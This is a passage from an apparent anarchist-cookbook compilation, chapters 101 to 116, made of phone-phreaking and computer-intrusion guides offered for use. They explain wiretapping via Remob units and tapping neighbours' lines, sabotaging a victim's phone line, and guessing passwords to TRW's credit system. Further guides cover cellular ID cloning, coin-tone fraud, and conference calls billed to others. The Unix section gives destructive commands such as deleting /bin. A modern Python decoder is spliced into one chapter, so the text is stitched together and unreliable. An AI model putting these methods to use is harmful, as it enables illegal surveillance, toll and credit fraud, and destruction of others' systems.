Chapters 101-150

101.RemObS by The Jolly Roger

Some of you may have heard of devices called Remobs, which stands for Remote Observation System. These devices allow supposedly authorized telephone employees to dial into them from anywhere, and then, using an ordinary touch tone fone, tap into a customer's line in a special receive only mode. [The mouthpiece circuit is deactivated, allowing totally silent observation from any fone in the world (Wire tapping without a court order is against the law)]

How Remobs Work

Dial the number of a Remob unit. Bell is rumored to put them in the 555 information exchanges, or on special access trunks [Unreachable except via blue box]. A tone will then be heard for approximately 2 seconds and then silence. You must key in (In DTMF) a 2 to 5 digit access code while holding each digit down at least 1 second. If the code is not entered within 5 or 6 seconds, the Remob will release and must be dialed again. If the code is supposedly another tone will be heard. A seven digit subscriber fone number can then be entered [The Remob can only handle certain 'exchanges' which are prewired, so usually one machine cannot monitor an entire NPA]. The Remob will then connect to the subscriber's line. The listener will hear the low level idle tone as long as the monitored party is on hook. As the monitored party dials [rotary or DTMF], the listener would hear [And Record] the number being dialed. Then the ENTIRE conversation, datalink, whatever is taking place, all without detection. There is no current box which can detect Remob observation, since it is being done with the telephone equipment that makes the connection. When the listener is finished monitoring that particular customer, he keys the last digit of the access code to disconnect him from the monitored line and return to the tone so that he can key in another 7 digit fone number.
When the listener is totally finished with the Remob, he keys a single 'disconnect digit' which disconnects him from the Remob so that the device can reset and be ready for another caller.

History of Remobs

Bell has kept the existence of Remobs very low key. Only in 1974, Bell acknowledged that Remobs existed. The device was first made public during hearings on "Telephone Monitoring Practices by Federal Agencies" before a subcommittee on government operations, House of Representatives, Ninety-Third Congress, June 1974. It has since been stated by Bell that the Remob devices are used exclusively for monitoring Bell employees such as operators, information operators, etc., to keep tabs on their performance. [Suuureee, we're stupid]

Possible Uses for Remobs

The possible uses of Remobs are almost as endless as the uses of self created fone line. Imagine the ability to monitor bank lines etc. Just off the top of my head I can think of these applications:

Data Monitoring of:
· TRW
· National Credit Bureau.
· AT&T Cosmos.
· Bank Institutions.
· CompuServe and other Networks.

Voice Monitoring of:
· Bank Institutions.
· Mail Order businesses.
· Bell Telephone themselves.
· Any place handling sensitive or important information.
· Anyone that you may not like.

With just one Remob, someone could get hundreds of credit cards, find out who was on vacation, get CompuServe passwords by the dozens, disconnect people's fones, do credit checks, find out about anything that they may want to find out about. I'm sure you brilliant can see the value of a telephone hobbyist and a telecommunications enthusiast getting his hands on a few choice Remobs.

Caution

If any reader should discover a Remob during his (or her) scanning excursions, please keep in mind the very strict federal laws regarding wiretapping and unauthorized use of private Bell property.
102.Scarlet Box Plans by The Jolly Roger

The purpose of a Scarlet box is to create a very bad connection. It can be used to crash a BBS or just make life miserable for those you seek to avenge.

Materials:
· 2 alligator clips
· 3 inch wire, or a resistor (plain wire will create greatest amount of static) (Resistor will decrease the amount of static in proportion to the resistor you are using)

1.Find the phone box at your victim's house, and pop the cover off.
2.Find the two prongs that the phone line you wish to box are connected to.
3.Hook your alligator clips to your (wire/resistor).
4.Find the lower middle prong and take off all wires connected to it, I think this disables the ground and call waiting and shit like that.
5.Now take one of the alligator clips and attach it to the upper most prong, and take the other and attach it to the lower middle prong.
6.Now put the cover back on the box and take off!!

[Diagram of the phone box. Legend: (**) = prongs, (/) = (wire/resistor), (##) = some phone bullshit]

103.Silver Box Plans by The Jolly Roger

Introduction: First a bit of Phone Trivia. A standard telephone keypad has 12 buttons. These buttons, when pushed, produce a combination of two tones. These tones represent the row and column of the button you are pushing.

        1209  1336  1477
 697    (1)   (2)   (3)
 770    (4)   (5)   (6)
 851    (7)   (8)   (9)
 941    (*)   (0)   (#)

So (1) produces a tone of 697+1209, (2) produces a tone of 697+1336, etc.

Function: What the Silver Box does is just create another column of buttons, with the new tone of 1633. These buttons are called A, B, C, and D.

Usefulness: Anyone who knows anything about phreaking should know that in the old days of phreaking, phreaks used hardware to have fun instead of other people's Sprint and MCI codes. The most famous (and useful) was the good ol' Blue Box.
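The row and column tone pairs described above, including the 1633 Hz fourth column, are what a receiver has to recognise. The Python below is an added example, not part of the original text: it decodes a constructed test signal with the Goertzel algorithm and reports any A-D tones, which a standard 12-button set does not send. Function names, frame length and thresholds are assumptions chosen for the example.

```python
import math

RATE = 8000                        # samples per second (telephone-band audio)
ROWS = (697, 770, 852, 941)        # row tones, Hz (standard third row is 852; the table above prints 851)
COLS = (1209, 1336, 1477, 1633)    # column tones, Hz; 1633 is the A-D column
KEYS = ("123A", "456B", "789C", "*0#D")
FOURTH_COLUMN = "ABCD"


def key_freqs(key):
    """Return the (row, column) frequency pair for one key."""
    if len(key) == 1:
        for r, row in enumerate(KEYS):
            c = row.find(key)
            if c >= 0:
                return ROWS[r], COLS[c]
    raise ValueError("not a DTMF key: %r" % (key,))


def synth(keys, tone_ms=80, gap_ms=80):
    """Constructed test input: each key as two summed sines, then silence."""
    out = []
    for key in keys:
        f_row, f_col = key_freqs(key)
        for i in range(RATE * tone_ms // 1000):
            t = i / RATE
            out.append(0.5 * math.sin(2 * math.pi * f_row * t)
                       + 0.5 * math.sin(2 * math.pi * f_col * t))
        out.extend([0.0] * (RATE * gap_ms // 1000))
    return out


def goertzel_power(frame, freq):
    """Squared magnitude of the frame's spectrum at a single frequency."""
    coeff = 2.0 * math.cos(2.0 * math.pi * freq / RATE)
    s1 = s2 = 0.0
    for x in frame:
        s1, s2 = x + coeff * s1 - s2, s1
    return s1 * s1 + s2 * s2 - coeff * s1 * s2


def strongest(frame, freqs, energy):
    """Index of the one clearly dominant tone in a group, or None."""
    powers = [goertzel_power(frame, f) for f in freqs]
    order = sorted(range(len(freqs)), key=powers.__getitem__, reverse=True)
    best, runner_up = order[0], order[1]
    # A clean tone pair puts about 0.25 of (N * energy) into each tone.
    present = powers[best] / (len(frame) * energy) > 0.1
    dominant = powers[best] > 5.0 * powers[runner_up]
    return best if present and dominant else None


def decode_frame(frame):
    """Decode one frame to a key; None for silence or no clear tone pair."""
    energy = sum(x * x for x in frame)
    if energy < 1e-6:
        return None
    r = strongest(frame, ROWS, energy)
    c = strongest(frame, COLS, energy)
    if r is None or c is None:
        return None
    return KEYS[r][c]


def decode(samples, frame_ms=40):
    """Decode a sample stream; a key is emitted once per continuous press."""
    n = RATE * frame_ms // 1000
    digits, last = [], None
    for start in range(0, len(samples) - n + 1, n):
        key = decode_frame(samples[start:start + n])
        if key is not None and key != last:
            digits.append(key)
        last = key
    return "".join(digits)


def fourth_column_events(digits):
    """Positions of A-D tones in a decoded digit string."""
    return [(i, d) for i, d in enumerate(digits) if d in FOURTH_COLUMN]


if __name__ == "__main__":
    heard = decode(synth("5B0D#"))
    print(heard, fourth_column_events(heard))
```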
However, Ma Bell decided to fight back and now most phone systems have protections against tone-emitting boxes. This makes boxing just about futile in most areas of the United States (i.e. those areas with Crossbar or Step-By-Step). If you live in or near a good-sized city, then your phone system is probably up-to-date (ESS) and this box (and most others) will be useless. However, if you live in the middle of nowhere (no offense intended), you may find a use for this and other boxes.

Materials:
· 1 Foot of Blue Wire
· 1 Foot of Gray Wire
· 1 Foot of Brown Wire
· 1 Small SPDT Switch (*)
· 1 Standard Ma Bell Phone

(*) SPDT = Single Pole/Double Throw

Tools:
· 1 Soldering Iron
· 1 Flat-Tip Screwdriver

Procedure:
1.Loosen the two screws on the bottom of the phone and take the casing off.
2.Loosen the screws on the side of the keypad and remove the keypad from the mounting bracket.
3.Remove the plastic cover from the keypad.
4.Turn the keypad so that *0# is facing you. Turn the keypad over. You'll see a bunch of wires, contacts, two Black Coils, etc.
5.Look at the Coil on the left. It will have five (5) Solder Contacts facing you. Solder the Gray Wire to the fourth Contact Pole from the left.
6.Solder the other end of the Gray Wire to the Left Pole of the SPDT Switch.
7.Find the Three (3) Gold-Plated Contacts on the bottom edge of the keypad. On the Left Contact, gently separate the two touching Connectors (they're soldered together) and spread them apart.
8.Solder the Brown Wire to the Contact farthest from you, and solder the other end to the Right Pole of the SPDT Switch.
9.Solder the Blue Wire to the Closest Contact, and the other end to the Center Pole of the SPDT Switch.
10.Put the phone back together.

Using The Silver Box: What you have just done was installed a switch that will change the 369# column into an ABCD column. For example, to dial a 'B', switch to Silver Box Tones and hit '6'. No one is sure of the A, B, and C uses.
However, in an area with an old phone system, the 'D' button has an interesting effect. Dial Directory Assistance and hold down 'D'. The phone will ring, and you should get a pulsing tone. If you get a pissed-off operator, you have a newer phone system with defenses against Silver Boxes. At the pulsing tone, dial a 6 or 7. These are loop ends.

104.Bell Trashing by The Jolly Roger

The Phone Co. will go to extremes on occasions. In fact, unless you really know what to expect from them, they will surprise the heck out of you with their "unpublished tariffs". Recently, a situation was brought to my attention that up till then I had been totally unaware of, least to mention, had any concern about. It involved garbage! The phone co. will go as far as to prosecute anyone who rummages through their garbage and helps himself to some Of course, they have their reasons for this, and no doubt benefit from such action. But, why should they be so picky about garbage? The answer soon became clear to me: those huge metal bins are filled up with more than waste old food and refuse...

Although it is Pacific Tele. policy to recycle paper waste products, sometimes employees do overlook this sacred operation when sorting the garbage. Thus top-secret confidential Phone Co. records go to the garbage bins instead of the paper shredders. Since it is constantly being updated with "company memorandums", and supplied with extensive reference material, the Phone co. must continually dispose of the outdated materials. Some phone companies are supplied each year with the complete "System Practices" guide. This publication is an over 40 foot long library of reference material about everything to do with telephones. As the new edition arrives each year, the old version of "System Practices" must also be thrown out.

I very quickly figured out where some local phone phreaks were getting their material.
They crawl into the garbage bins and remove selected items that are of particular interest to them and their fellow phreaks. One phone phreak in the Los Angeles area has salvaged the complete 1972 edition of "Bell System Practices". It is so large and was out of order (the binders had been removed) that it took him over a year to sort it out and create enough shelving for it in his garage. Much of this "Top Secret" information is so secret that most phone companies have no idea what is in their files. They have their hands full simply replacing everything each time a change in wording requires a new revision. It seems they waste more paper than they can read! It took quite a while for Hollywood Cal traffic manager to figure out how all of the local phone phreaks constantly discovered the switchroom test numbers. Whenever someone wanted to use the testboard, they found the local phone phreaks on the lines talking to all points all over the world. It got to the point where the local garbage buffs knew more about the office operations than the employees themselves. One phreak went so far as to call in and tell a switchman what his next daily assignment would be. This, however, proved to be too much. The switchman traced the call and one phone phreak was denied the tool of his trade. In another rather humorous incident, a fellow phreak was rummaging through the trash bin when he heard someone approaching. He pressed up against the side of the bin and silently waited for the goodies to come. You can imagine his surprise when the garbage from the lunchroom landed on his head. Most people find evenings best for checking out their local Telco trash piles. The only thing necessary is a flashlight and, in the case mentioned above, possibly a rain coat. A word of warning though, before you rush out and dive into the trash heap. It is probably illegal, but no matter where you live, you certainly won't get the local policeman to hold your flashlight for you. 
105.Canadian WATS Phonebook by The Jolly Roger

800-227-4004 ROLM Collagen Corp.
800-227-8933 ROLM Collagen Corp.
800-268-4500 Voice Mail
800-268-4501 ROLM Texaco
800-268-4505 Voice Mail
800-268-6364 National Data Credit
800-268-7800 Voice Mail
800-268-7808 Voice Mail
800-328-9632 Voice Mail
800-387-2097 Voice Mail
800-387-2098 Voice Mail
800-387-8803 ROLM Canadian Tire
800-387-8861 ROLM Canadian Tire
800-387-8862 ROLM Canadian Tire
800-387-8863 ROLM Canadian Tire
800-387-8864 ROLM Canadian Tire
800-387-8870 ROLM Halifax Life
800-387-8871 ROLM Halifax Life
800-387-9115 ASPEN Sunsweep
800-387-9116 ASPEN Sunsweep
800-387-9175 PBX [Hold Music = CHUM FM]
800-387-9218 Voice Messenger
800-387-9644 Carrier
800-426-2638 Carrier
800-524-2133 Aspen
800-663-5000 PBX/Voice Mail [Hold Music = CFMI FM]
800-663-5996 Voice Mail (5 rings)
800-847-6181 Voice Mail

NOTES: Each and every one of these numbers is available to the 604 (British Columbia) Area Code. Most are available Canada Wide and some are located in the United States. Numbers designated ROLM have been identified as being connected to a ROLM Phonemail system. Numbers designated ASPEN are connected to an ASPEN voice message system. Numbers designated VOICE MAIL have not been identified as to equipment in use on that line. Numbers designated carrier are answered by a modem or data set. Most Voice Message systems, and ALL Rolms, sound like an answering machine. Press 0 during the recording when in a rolm, * or # or other DTMF in other systems, and be propelled into another world...

106.Hacking TRW by The Jolly Roger

When you call TRW, the dial up will identify itself with the message "TRW". It will then wait for you to type the appropriate answer back (such as CTRL-G). Once this has been done, the system will say "CIRCUIT BUILDING IN PROGRESS" along with a few numbers. After this, it clears the screen (CTRL L) followed by a CTRL-Q. After the system sends the CTRL-Q, it is ready for the request.
You first type the 4 character identifier for the geographical area of the account. (For Example)

TCA1 - for certain Calif. & Vicinity subscribers.
TCA2 - A second Calif. TRW System.
TNJ1 - Their NJ Database.
TGA1 - Their Georgia Database.

The user then types A and then on the next line, he must type his 3 char. Option. Most Requests use the RTS option. OPX, RTX, and a few others exist. (NOTE: TRW will accept an A, C, or S as the 'X' in the options above.) Then finally, the user types his 7 digit subscriber code. He appends his 3-4 character password after it. It seems that if you manage to get hold of a TRW Printout (Trashing at Sears, Saks, ETC. or from getting your credit printout from them) their subscriber code will be on it, leaving only a 3-4 character p/w up to you.

For Example, (Call the DialUp)

TRW System Types, (ST)
CTRL-G (You type, YT)
Circuit building in progress 1234 (ST)
CTRL-L CTRL-Q (TCA1 CYT)
BTS 3000000AAA (YT]

Note: This system is in Half Duplex, Even Parity, 7 Bits per word and 2 Stop Bits.

CAUTION: It is a very stressed rumor that after typing in the TRW password Three (3) times, it sets an Automatic Number Identification on your ass, so be careful. And forget who told you how to do this..

107.Hacking Vax's & Unix by The Jolly Roger

Unix is a trademark of AT&T (and you know what that means)

In this article, we discuss the unix system that runs on the various vax systems. If you are on another unix-type system, some commands may differ, but since it is licensed to bell, they can't make many changes. Hacking onto a unix system is very difficult, and in this case, we advise having an inside source, if possible. The reason it is difficult to hack a vax is this: Many vax, after you get a carrier from them, respond=>

Login:

They give you no chance to see what the login name format is. Most commonly used are single words, under 8 digits, usually the person's name. There is a way around this: Most vax have an acct.
called 'suggest' for people to use to make a suggestion to the system root terminal. This is usually watched by the system operator, but at late he is probably at home sleeping or screwing someone's brains out. So we can write a program to send at the vax this type of a message: A screen freeze (Cntl-S), screen clear (system dependent), about 255 garbage characters, and then a command to create a login acct., after which you clear the screen again, then unfreeze the terminal.

What this does: When the terminal is frozen, it keeps a buffer of what is sent. Well, the buffer is about 127 characters long, so you overflow it with trash, and then you send a command line to create an acct. (System dependent). After this you clear the buffer and screen again, then unfreeze the terminal. This is a bad way to do it, and it is much nicer if you just send a command to the terminal to shut the system down, or whatever you are after...

There is always, *Always* an acct. called root, the most powerful acct. to be on, since it has all of the system files on it. If you hack your way onto this one, then everything is easy from here on... On the unix system, the abort key is the Cntl-D key. Watch how many times you hit this, since it is also a way to log off the system!

A little about unix architecture: The root directory, called root, is where the system resides. After this come a few 'sub' root directories, usually to group things (stats here, priv stuff here, the user log here...). Under this comes the superuser (the operator of the system), and then finally the normal users. In the unix 'Shell' everything is treated the same. By this we mean: You can access a program the same way you access a user directory, and so on. The way the unix system was written, everything, users included, are just programs belonging to the root directory.
Those of you who hacked onto the root, smile, since you can screw everything... The main level (exec level) prompt on the unix system is the $, and if you are on the root, you have a # (superuser prompt).

Ok, a few basics for the system... To see where you are, and what paths are active in regards to your user account, then type

=> pwd

This shows your acct. separated by a slash with another pathname (acct.), possibly many times. To connect through to another path, or many paths, you would type:

You=> path1/path2/path3

And then you are connected all the way from path1 to path3. You can run the programs on all the paths you are connected to. If it does not allow you to connect to a path, then you have insufficient privs, or the path is closed and archived onto tape. You can run programs this way also:

you=> path1/path2/path3/program-name

Unix treats everything as a program, and thus there are a few commands to learn... To see what you have access to in the end path, type: ls for list. This shows the programs you can run. You can connect to the root directory and run its programs with

=> /root

By the way, most unix systems have their log file on the root, so you can set up a watch on the file, waiting for people to log in and snatch their password as it passes thru the file. To connect to a directory, use the command:

=> cd pathname

This allows you to do what you want with that directory. You may be asked for a password, but this is a good way of finding other user names to hack onto. The wildcard character in unix, if you want to search down a path for a game or such, is the *.

=> ls /*

Should show you what you can access. The file types are the same as they are on a dec, so refer to that section when examining file. To see what is in a file, use the

=> pr filename

command, for print file. We advise playing with pathnames to get the hang of the concept. There is on-line help available on most systems with a 'help' or a '?'.
We advise you look thru the help files and pay attention to anything they give you on pathnames, or the commands for the system. You can, as a user, create or destroy directories on the tree beneath you. This means that root can kill everything but root, and you can kill any that are below you. These are the

=> mkdir pathname
=> rmdir pathname

commands. Once again, you are not alone on the system... type

=> who

to see what other users are logged in to the system at the time. If you want to talk to them

=> write username

Will allow you to chat at the same time, without having to worry about the parser. To send mail to a user, say

=> mail

And enter the mail sub-system. To send a message to all the users on the system, say

=> wall

Which stands for 'write all'. By the way, on a few systems, all you have to do is hit the key to end the message, but on others you must hit the cntl-D key. To send a single message to a user, say

=> write username

this is very handy again! If you send the sequence of characters discussed at the very beginning of this article, you can have the super-user terminal do tricks for you again.

Privs: If you want superuser privs, you can either log in as root, or edit your acct. so it can say

=> su

this now gives you the # prompt, and allows you to completely by-pass the protection. The wonderful security conscious developers at bell made it very difficult to do much without privs, but once you have them, there is absolutely nothing stopping you from doing anything you want to.

To bring down a unix system:

=> chdir /bin
=> rm *

this wipes out the pathname bin, where all the system maintenance files are. Or try:

=> r -r

This recursively removes everything from the system except the remove command itself. Or try:

=> kill -1,1
=> sync

This wipes out the system devices from operation. When you are finally sick and tired from hacking on the vax systems, just hit your cntl-d and repeat key, and you will eventually be logged out.
The reason this file seems to be very sketchy is the fact that bell has 7 licensed versions of unix out in the public domain, and these commands are those common to all of them. I recommend you hack onto the root or bin directory, since they have the highest levels of privs, and there is really not much you can do (except develop software) without them.

108.Verification Circuits by The Jolly Roger

1.One busy verification conference circuit is always provided. The circuit is a three-way conference bridge that enables an operator to verify the busy/idle condition of a subscriber line. Upon request of a party attempting to reach a specified directory number, the operator dials the called line number to determine if the line is in use, if the receiver is off the hook, or if the line is in lockout due to a fault condition. The operator then returns to the party trying to reach the directory number and states the condition of the line. Lines with data security cannot be accessed for busy verification when the line is in use. (Refer also to data security.)
2.Three ports are assigned to each busy verification conference circuit. One port is for operator access and two ports are used to split an existing connection. To verify the busy/idle condition of a line, the operator establishes a connection to the operator access port and dials the directory number of the line to be verified. If the line is in use, the existing connection is broken and immediately re-established through the other two ports of the busy verification circuit without interruption. Busy verification circuit is controlled by access code. A dedicated trunk can be used but is not necessary.
3.The busy verification circuit also can be used for test verify from the wire chief's test panel B. Additional busy verification conference circuits (002749)

There it is, right out of an ESS manual word for word! And I'm getting 25 linear feet of ESS manuals!!! Not counting the stack received so far!
109.White Box Plans by The Jolly Roger

Introduction: The White Box is simply a portable touch-tone keypad. For more information on touch-tone, see my Silver Box Plans.

Materials:
· 1 Touch-Tone Keypad
· 1 Miniature 1000 to 8 Ohm Transformer (Radio Shack # 273-1380)
· 1 Standard 8 Ohm Speaker
· 2 9V Batteries
· 2 9V Battery Clips

Procedure:
1.Connect the Red Wire from the Transformer to either terminal on the speaker.
2.Connect the White Wire from the transformer to the other terminal on the speaker.
3.Connect the Red Wire from one Battery Clip to the Black Wire from the other Battery Clip.
4.Connect the Red Wire from the second Battery Clip to the Green Wire from the Keypad.
5.Connect the Blue Wire from the Keypad to the Orange/Black Wire from the Keypad.
6.Connect the Black Wire from the first Battery Clip to the two above wires (Blue and Black/Orange).
7.Connect the Black Wire from the Keypad to the Blue Wire from the Transformer.
8.Connect the Red/Green Wire from the Keypad to the Green Wire from the Transformer.
9.Make sure the Black Wire from the Transformer and the remaining wires from the Keypad are free.
10.Hook up the Batteries.

Optional:
1.Put it all in a case.
2.Add a Silver Box to it.

Use: Just use it like a normal keypad, except put the speaker next to the receiver of the phone you're using.

110.The BLAST Box by The Jolly Roger

Ever want to really make yourself be heard? Ever talk to someone on the phone who just doesn't shut up? Or just call the operator and pop her eardrum? Well, up until recently it has been impossible for you to do these things. That is, unless of course you've got a blast box. All a blast box is, is a really cheap amplifier (around 5 watts or so) connected in place of the microphone on your telephone. It works best on model 500 AT&T Phones, and if constructed small enough, can be placed inside the phone.

Construction: Construction is not really important.
Well it is, but since I'm letting you make your own amp, I really don't have to include this.

Usage: Once you've built your blast box, simply connect a microphone (or use the microphone from the phone) to the input of the amplifier, and presto. There it is. Now, believe it or not, this device actually works. (At least on crossbar.) It seems that Illinois bell switching systems allow quite a lot of current to pass right through the switching office, and out to whoever you're calling. When you talk in the phone, it comes out of the other phone (again it works best if the phone that you're calling has the standard western electric earpiece) incredibly loud. This device is especially good for PBS Subscription drives. Have "Phun", and don't get caught!

111.Dealing with the Rate & Route Operator by The Jolly Roger

It seems that fewer and fewer people have blue boxes these days, and that is really too bad. Blue boxes, while not all that great for making free calls (since the TPC can tell when the call was made, as well as where it was to and from), are really a lot of fun to play with. Short of becoming a real live TSPS operator, they are about the only way you can really play with the network. For the few of you with blue boxes, here are some phrases which may make life easier when dealing with the rate & route (R&R) operators.

To get the R&R op, you send a KP + 141 + ST. In some areas you may need to put another NPA before the 141 (i.e., KP + 213 + 141 + ST), if you have no local R&R ops. The R&R operator has a myriad of information, and all it takes to get this data is mumbling cryptic phrases. There are basically four special phrases to give the R&R ops. They are NUMBERS route, DIRECTORY route, OPERATOR route, and PLACE NAME.

To get an area code for a city, one can call the R&R operator and ask for the numbers route. For example, to find the area code for Carson City, Nevada, we'd ask the R&R op for "Carson City, Nevada, numbers route, please."
and get the answer, "Right... 702 plus." meaning that 702 plus 7 digits gets us there.

Sometimes directory assistance isn't just NPA+131. The way to get these routings is to call R&R and ask for "Anaheim, California, directory route, please." Of course, she'd tell us it was 714 plus, which means 714 + 131 gets us the D.A. op there. This is sort of a pointless example, but I couldn't come up with a better one on short notice.

Let's say you wanted to find out how to get to the inward operator for Sacramento, California. The first six digits of a number in that city will be required (the NPA and an NXX). For example, let us use 916 756. We would call R&R, and when the operator answered, say, "916 756, operator route, please." The operator would say, "916 plus 001 plus." This means that 916 + 001 + 121 will get you the inward operator for Sacramento.

Do you know the city which corresponds to 503 640? The R&R operator does, and will tell you that it is Hillsboro, Oregon, if you sweetly ask for "Place name, 503 640, please."

For example, let's say you need the directory route for Sveg, Sweden. Simply call R&R, and ask for, "International, Baden, Switzerland. TSPS directory route, please." In response to this, you'd get, "Right... Directory to Sveg, Sweden. Country code 46 plus 1170." So you'd route yourself to an international sender, and send 46 + 1170 to get the D.A. operator in Sweden.

Inward operator routings to various countries are obtained the same way: "International, London, England, TSPS inward route, please." and get "Country code 44 plus 121." Therefore, 44 plus 121 gets you inward for London. Inwards can get you language assistance if you don't speak the language. Tell the foreign inward, "United States calling. Language assistance in completing a call to (called party) at (called number)."

R&R operators are people too, y'know. So always be polite, make sure use of 'em, and dial with care.
112.Cellular Phreaking by The Jolly Roger

The cellular/mobile phone system is one that is perfectly set up to be exploited by phreaks with the proper knowledge and equipment. Thanks to deregulation, the regional BOC's (Bell Operating Companies) are scattered and do not communicate much with each other. Phreaks can take advantage of this by pretending to be mobile phone customers whose "home base" is a city served by a different BOC, known as a "roamer". Since it is impractical for each BOC to keep track of the customers of all the other BOC's, they will usually allow the customer to make the calls he wishes, often with a surcharge of some sort. The bill is then forwarded to the roamer's home BOC for collection. However, it is fairly simple (with the correct tools) to create a bogus ID number for your mobile phone, and pretend to be a roamer from some other city and state, that's "just visiting". When your BOC tries to collect for the calls from your alleged "home BOC", they will discover you are not a real customer; but by then, you can create an entirely new electronic identity, and use that instead.

How does the cellular system know who is calling, and where they are?

When a mobile phone enters a cell's area of transmission, it transmits its phone number and its 8 digit ID number to that cell, who will keep track of it until it gets far enough away that the sound quality is sufficiently diminished, and then the phone is "handed off" to the cell that the customer has walked or driven into. This process continues as long as the phone has power and is turned on. If the phone is turned off (or the car is), someone attempting to call the mobile phone will receive a recording along the lines of "The mobile phone customer you have dialed has left the vehicle or driven out of the service area." When a call is made to a mobile phone, the switching equipment will check to see if the mobile phone being called is "logged in", so to speak, or present in one of the cells.
If it is, the call will then act (to the speaking parties) just like a normal call - the caller may hear a busy tone, the phone may just ring, or the call may be answered.

How does the switching equipment know whether or not a particular phone is authorized to use the network?

Many times, it doesn't. When a dealer installs a mobile phone, he gives the phone's ID number (an 8 digit hexadecimal number) to the local BOC, as well as the phone number the BOC assigned to the customer. Thereafter, whenever a phone is present in one of the cells, the two numbers are checked - they should be registered to the same person. If they don't match, the telco knows that an attempted fraud is taking place (or at best, some transmission error) and will not allow calls to be placed or received at that phone. However, it is impractical (especially given the present state of deregulation) for the telco to have records of every cellular customer of every BOC. Therefore, if you're going to create a fake ID/phone number combination, it will need to be "based" in an area that has a cellular system (obviously), has a different BOC than your local area does, and has some sort of a "roamer" agreement with your local BOC.

How can one "phreak" a cellular phone?

There are three general areas when phreaking cellular phones; using one you found in an unlocked car (or an unattended walk-about model), modifying your own chip set to look like a different phone, or recording the phone number/ID number combinations sent by other local cellular phones, and using those as your own. Most cellular phones include a crude "password" system to keep unauthorized users from using the phone - however, dealers often set the password (usually a 3 to 5 digit code) to the last four digits of the customer's mobile phone number. If you can find that somewhere on the phone, you're in luck.
If not, it shouldn't be TOO hard to hack, since most people aren't smart enough to use something besides "1111", "1234", or whatever. If you want to modify the chip set in a cellular phone you bought (or stole), there are two chips (of course, this depends on the model and manufacturer, yours may be different) that will need to be changed - one installed at the manufacturer (often epoxied in) with the phone's ID number, and one installed by the dealer with the phone number, and possible the security code. To do this, you'll obviously need an EPROM burner as well as the same sort of chips used in the phone (or a friendly and unscrupulous dealer!). As to recording the numbers of other mobile phone customers and using them; as far as I know, this is just theory... but it seems quite possible, if you've got the equipment to record and decode it. The cellular system would probably freak out if two phones (with valid ID/phone number combinations) were both present in the network at once, but it remains to be seen what will happen. 113.Cheesebox Plans by The Jolly Roger A Cheesebox (named for the type of box the first one was found in) is a type of box which will, in effect, make your telephone a Pay-Phone.....This is a simple, modernized, and easy way of doing it.... Inside Info: These were first used by bookies many years ago as a way of making calls to people without being called by the cops or having their numbers traced and/or tapped...... How To Make A Modern Cheese Box Ingredients: · 1 Call Forwarding service on the line · 1 Set of Red Box Tones · The number to your prefix's Intercept operator (do some scanning for this one) How To: After you find the number to the intercept operator in your prefix, use your call-forwarding and forward all calls to her...this will make your phone stay off the hook(actually, now it waits for a quarter to be dropped in)...you now have a cheese box... 
In Order To Call Out On This Line: You must use your Red Box tones and generate the quarter dropping in...then, you can make phone calls to people...as far as I know, this is fairly safe, and they do not check much...Although I am not sure, I think you can even make credit-card calls from a cheesebox phone and not get traced... 114.How to start your own conferences! by The Jolly Roger Black Bart showed how to start a conference call thru an 800 exchange, and I will now explain how to start a conference call in a more orthodox fashion, the 2600Hz. Tone. Firstly, the fone company has what is called switching systems. There are several types, but the one we will concern ourselves with, is ESS (electronic switching system). If your area is zoned for ESS, do not start a conference call via the 2600Hz. Tone, or bell security will nail your ass! To find out if you are under ESS, call your local business office, and ask them if you can get call waiting/forwarding, and if you can, that means that you are in ESS country, and conference calling is very, very dangerous!!! Now, if you are not in ESS, you will need the following equipment: · An Apple CAT II modem · A copy of TSPS 2 or CAT'S Meow · A touch tone fone line · A touch tone fone. (True tone) Now, with TSPS 2, do the following: 1.Run tsps 2 2.Chose option 1 3.Chose option 6 4.Chose sub-option 9 5.Now type: 1-514-555-1212 (dashes are not needed) 6.Listen with your handset, and as soon as you hear a loud click, then type: $ 7.To generate the 2600 hz. Tone. This obnoxious tone will continue for a few 8.Seconds, then listen again and you should hear another loud 'click'. 9.Now type: km2130801050s · 'K' = kp tone · 'M' = multi frequency mode · 'S' = s tone 10.Now listen to the handset again, and wait until you hear the 'click' again. Then type: km2139752975s · 2139751975 is the number to bill the conference call to. 
Note: 213-975-1975 is a disconnected number, and I strongly advise that you only bill the call to this number, or the fone company will find out, and then.. remember, conference calls are itemized, so if you do bill it to an enemy's number, he can easily find out who did it and he can bust you! You should now hear 3 beeps, and a short pre-recorded message. From here on, everything is all menu driven. Conference call commands From the '#' mode: · 1 = call a number · 6 = transfer control · 7 = hangs up the conference call · 9 = will call a conference operator Stay away from 7 and 9! If for some reason an operator gets on-line, hang up! If you get a busy signal after km2130801050s, that means that the teleconference line is temporarily down. Try later, preferably from 9am to 5pm week days, since conference calls are primarily designed for business people. 115.Gold Box Plans by The Jolly Roger HOW TO BUILD IT You will need the following: · Two 10K OHM and three 1.4K OHM resistors · Two 2N3904 transistors · Two Photo Cells · Two Red LED'S (The more light produced the better) · A box that will not let light in · Red and Green Wire Light from the #1 LED must shine directly on the photocell #1. The gold box I made needed the top of the LED's to touch the photo cell for it to work. The same applies to the #2 photo cell and LED. 1 :-PHOTOCELL--: : : : :BASE : 1 TTTTT : +LED- TRANSISTOR : TTTTT : : : : -I(-- : :COLLECTOR RED1--< >:--: :-------:-----GREEN2 -I(-- : ----------: : : 2 :-/+/+/-/+/+/-/+/+/-/+/+/ LED 10K 10K 1.4K 1.4K RESISTORES 2 -PHOTOCELL----------------- : : :BASE : TTTTT : TRANSISTOR : TTTTT : : :EMITTER : GREEN1- --------------------------RED2 : : /+/+/ 1.4K The 1.4K resistor is variable and if the second part of the gold box is skipped it will still work but when someone picks up the phone they will hear a faint dial tone in the background and might report it to the Gestapo er...(AT&T). 
1.4K will give you good reception with little risk of a Gestapo agent at your door. Now that you have built it take two green wires of the same length and strip the ends, twist two ends together and connect them to green1 and place a piece of tape on it with "line #1" writing on it. Continue the process with red1 only use red wire. Repeat with red2 and green2 but change to line #2. HOW TO INSTALL You will need to find two phone lines that are close together. Label one of the phone lines "Line #1". Cut the phone lines and take the outer coating off it. There should be 4 wires. Cut the yellow and black wires off and strip the red and green wires for both lines. Line #1 should be in two pieces. Take the green wire of one end and connect it to one of the green wires on the gold box. Take the other half of line #1 and hook the free green wire to the green wire on the phone line. Repeat the process with red1 and the other line. All you need to do now is to write down the phone numbers of the place you hooked it up at and go home and call it. You should get a dial tone!!! If not, try changing the emitter with the collector. 116.The History of ESS by The Jolly Roger Of all the new 1960s wonders of telephone technology - satellites, ultra modern Traffic Service Positions (TSPS) for operators, the picturephone, and so on - the one that gave Bell Labs 